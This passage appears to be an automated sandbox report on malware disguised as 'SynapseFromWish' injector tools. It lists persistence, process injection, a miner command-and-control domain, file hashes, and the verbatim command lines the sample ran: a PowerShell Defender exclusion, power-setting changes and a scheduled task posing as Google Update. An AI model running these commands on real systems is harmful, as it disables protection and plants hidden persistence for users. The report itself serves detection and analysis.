| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-4078585466-1563564224-3678410669-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\injector.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\injector.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-4078585466-1563564224-3678410669-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\injector = "C:\\Users\\Admin\\AppData\\Roaming\\injector.exe" | C:\Users\Admin\AppData\Roaming\injector.exe | N/A |
Enumerates physical storage devices
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\injector.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4500 wrote to memory of 4088 | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\injector.exe | C:\Users\Admin\AppData\Roaming\injector.exe |
| PID 4500 wrote to memory of 4088 | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\injector.exe | C:\Users\Admin\AppData\Roaming\injector.exe |
| PID 4500 wrote to memory of 4088 | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\injector.exe | C:\Users\Admin\AppData\Roaming\injector.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\injector.exe
"C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\injector.exe"
C:\Users\Admin\AppData\Roaming\injector.exe
"C:\Users\Admin\AppData\Roaming\injector.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.128.231.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.208.79.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.228.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | silentminer.tplinkdns.com | udp |
| GB | 81.158.135.251:9545 | silentminer.tplinkdns.com | tcp |
| US | 8.8.8.8:53 | 208.194.73.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| GB | 81.158.135.251:9545 | silentminer.tplinkdns.com | tcp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.81.21.72.in-addr.arpa | udp |
| GB | 81.158.135.251:9545 | silentminer.tplinkdns.com | tcp |
| GB | 81.158.135.251:9545 | silentminer.tplinkdns.com | tcp |
| GB | 81.158.135.251:9545 | silentminer.tplinkdns.com | tcp |
| GB | 81.158.135.251:9545 | silentminer.tplinkdns.com | tcp |
| GB | 81.158.135.251:9545 | silentminer.tplinkdns.com | tcp |
Files
memory/4500-0-0x0000000000310000-0x0000000000332000-memory.dmp
memory/4500-1-0x0000000075240000-0x00000000759F0000-memory.dmp
memory/4500-2-0x0000000005410000-0x00000000059B4000-memory.dmp
memory/4500-3-0x0000000004D60000-0x0000000004DF2000-memory.dmp
memory/4500-4-0x0000000004F70000-0x0000000004F80000-memory.dmp
memory/4500-5-0x0000000004D40000-0x0000000004D4A000-memory.dmp
C:\Users\Admin\AppData\Roaming\injector.exe
| MD5 | 311b5c55bcd7a7bf987d264a3904770e |
| SHA1 | 7df136430c19887e24cff480d6346dc9e75d2029 |
| SHA256 | 680d7600e0985ce1ec135784b11cf8eef62d4e6dcb540ccc082e339dffa89504 |
| SHA512 | 686a8041c9c1edb40e86439052813e78dab7b86e6d02b35268cf65780046ba164d3a26481c34247beac9c4518e4f69ceb5228e9f7af378ad83a5449e9573b271 |
C:\Users\Admin\AppData\Roaming\injector.exe
| MD5 | 311b5c55bcd7a7bf987d264a3904770e |
| SHA1 | 7df136430c19887e24cff480d6346dc9e75d2029 |
| SHA256 | 680d7600e0985ce1ec135784b11cf8eef62d4e6dcb540ccc082e339dffa89504 |
| SHA512 | 686a8041c9c1edb40e86439052813e78dab7b86e6d02b35268cf65780046ba164d3a26481c34247beac9c4518e4f69ceb5228e9f7af378ad83a5449e9573b271 |
C:\Users\Admin\AppData\Roaming\injector.exe
| MD5 | 311b5c55bcd7a7bf987d264a3904770e |
| SHA1 | 7df136430c19887e24cff480d6346dc9e75d2029 |
| SHA256 | 680d7600e0985ce1ec135784b11cf8eef62d4e6dcb540ccc082e339dffa89504 |
| SHA512 | 686a8041c9c1edb40e86439052813e78dab7b86e6d02b35268cf65780046ba164d3a26481c34247beac9c4518e4f69ceb5228e9f7af378ad83a5449e9573b271 |
memory/4088-17-0x0000000075240000-0x00000000759F0000-memory.dmp
memory/4500-18-0x0000000075240000-0x00000000759F0000-memory.dmp
memory/4088-19-0x0000000005640000-0x0000000005650000-memory.dmp
memory/4088-20-0x0000000075240000-0x00000000759F0000-memory.dmp
memory/4088-21-0x0000000005640000-0x0000000005650000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2023-09-12 08:29
Reported
2023-09-12 08:32
Platform
win7-20230831-en
Max time kernel
150s
Max time network
124s
Command Line
Signatures
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2928 created 1268 | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | C:\Windows\Explorer.EXE |
| PID 2928 created 1268 | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | C:\Windows\Explorer.EXE |
| PID 2928 created 1268 | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | C:\Windows\Explorer.EXE |
| PID 2928 created 1268 | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | C:\Windows\Explorer.EXE |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2928 set thread context of 2772 | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | C:\Windows\System32\dialer.exe |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 | C:\Windows\system32\csrss.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\MultifunctionAdapter\0\KeyboardController\0 | C:\Windows\system32\csrss.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2 | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2\Component Information | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0\Component Information | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1\Identifier | C:\Windows\system32\csrss.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\MultifunctionAdapter\1\KeyboardController | C:\Windows\system32\csrss.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1 | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1\Configuration Data | C:\Windows\system32\csrss.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2 | C:\Windows\system32\csrss.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\Component Information | C:\Windows\system32\csrss.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\Identifier | C:\Windows\system32\csrss.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 | C:\Windows\system32\csrss.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1 | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0\Configuration Data | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\Configuration Data | C:\Windows\system32\csrss.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter | C:\Windows\system32\csrss.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\1\Component Information | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2\Configuration Data | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\Identifier | C:\Windows\system32\csrss.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\MultifunctionAdapter\0\KeyboardController | C:\Windows\system32\csrss.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0 | C:\Windows\system32\csrss.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter | C:\Windows\system32\csrss.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0 | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\2\Identifier | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\KeyboardController\0\KeyboardPeripheral\0\Identifier | C:\Windows\system32\csrss.exe | N/A |
| Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\Configuration Data | C:\Windows\system32\csrss.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\Component Information | C:\Windows\system32\csrss.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\ThemeManager\LoadedBefore = "1" | C:\Windows\system32\winlogon.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\ThemeManager\LastLoadedDPI = "96" | C:\Windows\system32\winlogon.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\ThemeManager\DllName = "%SystemRoot%\\resources\\themes\\Aero\\Aero.msstyles" | C:\Windows\system32\winlogon.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\ThemeManager\ColorName = "NormalColor" | C:\Windows\system32\winlogon.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\ThemeManager\SizeName = "NormalSize" | C:\Windows\system32\winlogon.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Control Panel\Desktop\MuiCached\MachinePreferredUILanguages = 65006e002d00550053000000 | C:\Windows\system32\winlogon.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\ThemeManager | C:\Windows\system32\winlogon.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\ThemeManager\ThemeActive = "1" | C:\Windows\system32\winlogon.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\ThemeManager\LastUserLangID = "1033" | C:\Windows\system32\winlogon.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe | N/A |
| N/A | N/A | C:\Windows\System32\dialer.exe | N/A |
| N/A | N/A | C:\Windows\System32\dialer.exe | N/A |
| N/A | N/A | C:\Windows\System32\dialer.exe | N/A |
| N/A | N/A | C:\Windows\System32\dialer.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\dialer.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\powercfg.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\LogonUI.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\system32\LogonUI.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\services.exe
C:\Windows\system32\services.exe
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsm.exe
C:\Windows\system32\lsm.exe
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe
"C:\Users\Admin\AppData\Local\Temp\SynapseFromWish\release-v2.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#eszkltr#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\dialer.exe
C:\Windows\System32\dialer.exe
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\system32\Dwm.exe
"C:\Windows\system32\Dwm.exe"
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
C:\Windows\system32\csrss.exe
%SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x0
Network
Files
memory/2928-0-0x000000013F640000-0x000000013FC57000-memory.dmp
memory/2348-5-0x000000001B220000-0x000000001B502000-memory.dmp
memory/2348-6-0x000007FEF5400000-0x000007FEF5D9D000-memory.dmp
memory/2348-8-0x0000000001DA0000-0x0000000001DA8000-memory.dmp
memory/2348-9-0x0000000002360000-0x00000000023E0000-memory.dmp
memory/2348-10-0x0000000002360000-0x00000000023E0000-memory.dmp
memory/2348-7-0x0000000002360000-0x00000000023E0000-memory.dmp
memory/2348-11-0x000007FEF5400000-0x000007FEF5D9D000-memory.dmp
memory/2348-12-0x0000000002360000-0x00000000023E0000-memory.dmp
memory/2348-13-0x000007FEF5400000-0x000007FEF5D9D000-memory.dmp
memory/2772-16-0x0000000076D70000-0x0000000076F19000-memory.dmp
memory/2772-18-0x0000000076C50000-0x0000000076D6F000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 903f5130e2a2dcee54994c201fcf5b62 |
| SHA1 | e2a9e0d806eef836d96840cc27f336558837d509 |
| SHA256 | 9489c6adc998572945ac76f05c8e87140a656240316f851dbbfdc0669b6b76c4 |
| SHA512 | 35b2bfb64500cd22d6bf0bb269665fed82c12e2c28019a6faeaf1d461599214670fb8a9fe41cbc96fb0d790abb698b0c88dbea591658b1cc54f8c106d7d04f24 |
memory/1900-25-0x000000001B270000-0x000000001B552000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GACD2AQDNO4NNUNWMF57.temp
| MD5 | 903f5130e2a2dcee54994c201fcf5b62 |
| SHA1 | e2a9e0d806eef836d96840cc27f336558837d509 |
| SHA256 | 9489c6adc998572945ac76f05c8e87140a656240316f851dbbfdc0669b6b76c4 |
| SHA512 | 35b2bfb64500cd22d6bf0bb269665fed82c12e2c28019a6faeaf1d461599214670fb8a9fe41cbc96fb0d790abb698b0c88dbea591658b1cc54f8c106d7d04f24 |
memory/1900-27-0x000007FEF4A60000-0x000007FEF53FD000-memory.dmp
memory/420-26-0x0000000000720000-0x0000000000741000-memory.dmp
memory/420-24-0x0000000000720000-0x0000000000741000-memory.dmp
memory/1900-29-0x0000000002720000-0x00000000027A0000-memory.dmp
memory/1900-28-0x0000000002250000-0x0000000002258000-memory.dmp
memory/420-32-0x0000000000750000-0x0000000000777000-memory.dmp
memory/420-31-0x0000000000750000-0x0000000000777000-memory.dmp
memory/1900-38-0x0000000002720000-0x00000000027A0000-memory.dmp
memory/1900-37-0x000007FEF4A60000-0x000007FEF53FD000-memory.dmp
memory/464-40-0x0000000000980000-0x00000000009A7000-memory.dmp
memory/1900-39-0x0000000002720000-0x00000000027A0000-memory.dmp
memory/2928-35-0x000000013F640000-0x000000013FC57000-memory.dmp
memory/480-43-0x0000000000B10000-0x0000000000B37000-memory.dmp
memory/464-44-0x000007FEBEA40000-0x000007FEBEA50000-memory.dmp
memory/2772-47-0x0000000140000000-0x0000000140029000-memory.dmp
memory/480-48-0x000007FEBEA40000-0x000007FEBEA50000-memory.dmp
memory/464-50-0x0000000036DB0000-0x0000000036DC0000-memory.dmp
memory/480-53-0x0000000036DB0000-0x0000000036DC0000-memory.dmp
memory/480-61-0x0000000000B10000-0x0000000000B37000-memory.dmp
memory/464-63-0x0000000076DC1000-0x0000000076DC2000-memory.dmp
memory/1900-66-0x0000000002720000-0x00000000027A0000-memory.dmp
memory/488-65-0x0000000036DB0000-0x0000000036DC0000-memory.dmp
memory/488-64-0x000007FEBEA40000-0x000007FEBEA50000-memory.dmp
memory/2772-62-0x0000000076D70000-0x0000000076F19000-memory.dmp
memory/488-60-0x00000000003C0000-0x00000000003E7000-memory.dmp
memory/1900-69-0x000007FEF4A60000-0x000007FEF53FD000-memory.dmp
memory/488-68-0x00000000003C0000-0x00000000003E7000-memory.dmp
memory/2884-70-0x00000000026E0000-0x00000000026E1000-memory.dmp
memory/464-71-0x0000000000980000-0x00000000009A7000-memory.dmp
memory/2884-72-0x00000000026E0000-0x00000000026E1000-memory.dmp